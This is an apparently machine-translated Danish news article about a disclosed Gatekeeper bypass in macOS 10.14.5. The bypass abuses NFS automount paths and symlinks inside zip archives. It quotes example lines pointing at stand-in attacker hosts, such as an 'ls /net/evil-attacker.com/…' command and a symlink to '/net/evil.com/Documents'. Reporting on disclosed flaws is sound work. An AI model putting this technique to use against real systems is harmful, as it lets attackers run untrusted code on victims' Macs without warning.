En unpatched sårbarhed i MacOS 10.14.5 også kendt som Mojave nylig blev opdaget. Fejlen kan give en hacker at udføre vilkårlig kode uden behov for brugerinteraktion, dermed går uden Gatekeeper.
Denne opdagelse kommer fra forsker Filippo Cavallarin fra Segment, en Italien-baserede cybersikkerhed selskab. "På MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,”Forskeren skrev.
Hvordan er Gatekeeper bypass muligt?
Første, Det skal bemærkes, at det er i Gatekeeper design til at acceptere både eksterne drev og netværk aktier som sikkert sted, tillader apps, de indeholder for at køre fejlfrit. Men, ved at sammensætte to legitime funktioner af MacOS, er det muligt at bedrage Gatekeeper og dens ”tilsigtet adfærd".
Så, hvad er disse funktioner? Den første giver brugeren mulighed for automatisk at montere et netværksshare ved simpelthen at acceptere en sti, der begynder med ”/ net /”:
For eksempel
ls /net/evil-attacker.com/sharedfolder/
vil gøre os læse indholdet af ’sharedfolder’ på den eksterne vært (evil-attacker.com) ved hjælp af NFS.
Den anden funktion er om zip-arkiver, der indeholder symbolske links, der peger på tilfældige placeringer. Endvidere, den software, der decompresses zip-filer på MacOS ikke udføre kontrol på symlinks før at skabe dem, forskeren forklarede.
Hvordan ville et angreb arbejde? En hacker kunne udforme en zip-fil med en symbolsk link til en automount hacker-kontrolleret endepunkt (ex Dokumenter -> /net/evil.com/Documents) og kunne sende den til et målrettet system. Brugeren vil downloade ondsindet arkiv, og ville udtrække skadelig fil uden at ane noget.
Nu offeret er i en placering kontrolleret af angriberen, men tillid til Gatekeeper, så enhver angriber-kontrollerede eksekverbare kan køres uden nogen advarsel. Den måde Finder er udviklet (ex skjul .app udvidelser, skjule fulde sti fra titellinjen) gør denne tecnique meget effektiv og svært at få øje, forskeren bemærkede.
Der er også en video demonstration af hvordan dette Gatekeeper bypass værker.
Det er ikke det første tilfælde af MacOS bygge-i beskyttelse a.k.a. Gatekeeper bliver omgået. I februar i år, Trend Micro sikkerhed forskere opdagede, at en ondsindet Windows .exe fil kunne inficere Mac-computere, og kunne hente infostealer malware ledsaget af adware på deres systemer.
I dette tilfælde, Exe-filer var i stand til at unddrage sig Gatekeeper beskyttelse, fordi de ikke blev kontrolleret af softwaren, designet til at kontrollere kun indfødte Mac-filer. Dette kan føre til at omgå koden signatur kontrol og verifikation.
Milena Dimitrova
En inspireret forfatter og indholdschef, der har været hos SensorsTechForum siden projektets start. En professionel med 10+ års erfaring med at skabe engagerende indhold. Fokuseret på brugernes privatliv og malware udvikling, hun tror stærkt på en verden, hvor cybersikkerhed spiller en central rolle. Hvis almindelig sund fornuft giver ingen mening, hun vil være der til at tage noter. Disse noter senere kan blive til artikler! Følg Milena @Milenyim
Følg mig: